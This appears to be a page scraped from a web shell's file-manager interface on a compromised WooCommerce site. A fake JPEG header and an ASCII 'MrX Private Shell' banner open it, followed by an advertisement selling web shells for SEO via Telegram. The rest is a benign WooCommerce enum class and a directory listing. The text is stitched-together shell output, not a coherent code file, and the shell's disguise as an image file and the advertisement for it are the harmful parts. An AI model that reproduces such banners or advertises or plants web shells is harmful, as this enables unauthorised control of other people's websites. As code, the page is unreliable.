����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
declare( strict_types = 1 );
namespace Automattic\WooCommerce\Enums;
/**
* Enum class for the possible values of the `woocommerce_tax_based_on` option,
* which determines which address is used to calculate tax.
*
* @since 10.8.0
*/
final class TaxBasedOn {
/**
* Tax is calculated based on the customer's shipping address.
*
* @var string
*/
public const SHIPPING = 'shipping';
/**
* Tax is calculated based on the customer's billing address.
*
* @var string
*/
public const BILLING = 'billing';
/**
* Tax is calculated based on the shop's base address.
*
* @var string
*/
public const BASE = 'base';
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| CatalogVisibility.php | File | 854 B | 0644 |
|
| DefaultCustomerAddress.php | File | 720 B | 0644 |
|
| FeaturePluginCompatibility.php | File | 796 B | 0644 |
|
| OrderInternalStatus.php | File | 1.22 KB | 0644 |
|
| OrderItemType.php | File | 640 B | 0644 |
|
| OrderStatus.php | File | 2.59 KB | 0644 |
|
| PaymentGatewayFeature.php | File | 3.03 KB | 0644 |
|
| ProductStatus.php | File | 1.14 KB | 0644 |
|
| ProductStockStatus.php | File | 838 B | 0644 |
|
| ProductTaxStatus.php | File | 533 B | 0644 |
|
| ProductType.php | File | 888 B | 0644 |
|
| TaxBasedOn.php | File | 649 B | 0644 |
|